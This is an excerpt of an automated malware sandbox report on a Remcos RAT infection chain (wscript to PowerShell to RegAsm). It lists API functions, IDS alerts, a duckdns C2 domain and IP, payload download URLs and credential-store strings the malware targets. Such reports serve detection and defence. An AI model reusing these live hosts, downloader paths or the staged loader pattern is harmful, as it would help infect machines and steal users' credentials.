                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_10006580 FindFirstFileExA,11_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2

                      Software Vulnerabilities

                      Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                      Networking

                      Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49714 -> 135.148.195.248:6875
                      Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49722 -> 135.148.195.248:6875
                      Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.40:80 -> 192.168.2.5:49708
                      Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.40:80 -> 192.168.2.5:49708
                      Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.111.133:443 -> 192.168.2.5:49707
                      Source: Malware configuration extractor | URLs: idabo.duckdns.org
                      Source: unknown | DNS query: name: idabo.duckdns.org
                      Source: global traffic | TCP traffic: 192.168.2.5:49714 -> 135.148.195.248:6875
                      Source: global traffic | HTTP traffic detected: GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /450/RRFCCE.txt HTTP/1.1 | Host: 192.3.220.40 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                      Source: Joe Sandbox View | IP Address: 135.148.195.248 135.148.195.248
                      Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox View | ASN Name: AVAYAUS AVAYAUS
                      Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox View | ASN Name: FASTLYUS FASTLYUS
                      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49723 -> 178.237.33.50:80
                      Source: global traffic | HTTP traffic detected: GET /450/seethebestpricewithgoodcookiesme.tIF HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 192.3.220.40 | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 192.3.220.40 (50 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04EA4BB0 URLDownloadToFileW
Source: RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: RegAsm.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: idabo.duckdns.org
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.0000000004735000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.40
Source: powershell.exe, 00000001.00000002.2137672850.0000000007BD4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.40/
Source: powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.0000000004735000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.40/450/RRFCCE.txt
Source: powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.40/450/RRFCP
Source: powershell.exe, 00000001.00000002.2119899349.00000000050F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.40/450/seethebe
Source: powershell.exe, 00000001.00000002.2119899349.00000000050F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF
Source: powershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFGm
Source: powershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFPG
Source: powershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFrosoft
Source: powershell.exe, 00000001.00000002.2118359781.00000000035F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFs
Source: powershell.exe, 00000001.00000002.2118359781.00000000035F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFvu
Source: powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.24:
Source: bhv29F.tmp.12.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv29F.tmp.12.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: powershell.exe, 00000001.00000002.2137672850.0000000007B8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: bhv29F.tmp.12.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv29F.tmp.12.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv29F.tmp.12.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.000000000143F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpRr&
Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gphy
Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpur
Source: powershell.exe, 00000003.00000002.2060949985.0000000004DBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: powershell.exe, 00000001.00000002.2132026884.0000000006008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2063385323.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv29F.tmp.12.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2119899349.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2060949985.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.0000000005208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.00000000044B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
